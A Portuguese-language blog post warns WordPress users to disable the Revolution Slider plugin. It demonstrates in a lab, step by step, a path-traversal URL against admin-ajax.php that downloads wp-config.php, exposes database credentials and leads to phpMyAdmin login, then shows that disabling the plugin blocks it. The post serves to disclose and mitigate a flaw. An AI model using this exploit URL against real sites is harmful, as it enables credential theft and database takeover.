WordPress — Desative o plugin Revolution Slider
0
0

WordPress — Desative o plugin Revolution Slider

Marcos Henrique
0 min
0
0
Email image

Para aqueles que utilizam o WordPress desativem o plugin Revolution Slide, pois foi divulgado uma vulnerabilidade que permite que a senha do banco de dados seja capturada com muita facilidade permitindo assim quem um cracker possa obter acesso a todo o site e capturar as informações.

Site : themepunch.com/revolution

01 — Passo

Preparei o servidor 10.10.10.131 e com a versão mais atual do WordPress 3.9.2 e instalei o plugin Revolution Slider.

Email image

02 — Passo

Após adicionar o caminho abaixo na URL do WordPress automaticamente inicia-se o download do arquivo admin-ajax.php contendo as informações do banco de dados.

http://10.10.10.131/wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Email image

03 — Passo

Como pode visualizar o arquivo exibe:

DB_NAME : wordpress ( Nome do Banco de Dados ).
DB_USER : 100security ( Nome do Usuário utilizado na conexão com o Banco de Dados ).
DB_PASSWORD : P@ssw0rd@@123456 ( Senha do Usuário 100security utilizado na conexão com o Banco de Dados ).

Email image

04 — Passo

Com estas informações agora é possível realizar o acesso ao Banco de Dados do WordPress através do PHPMyAdmin.

http://10.10.10.131/phpmyadmin

Usuário : 100security
Senha : P@ssw0rd@@123456

Email image

05 — Passo

Acesso Completo ao Banco de Dados do WordPress

Email image

06 — Passo

Desative o plugin Revolution Slider.

Email image

07 — Passo

Após desativar o plugin verifique que ao tentar realizar um novo ataque o download não é realizado.

http://10.10.10.131/wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Email image

Fonte: https://www.100security.com.br/revslider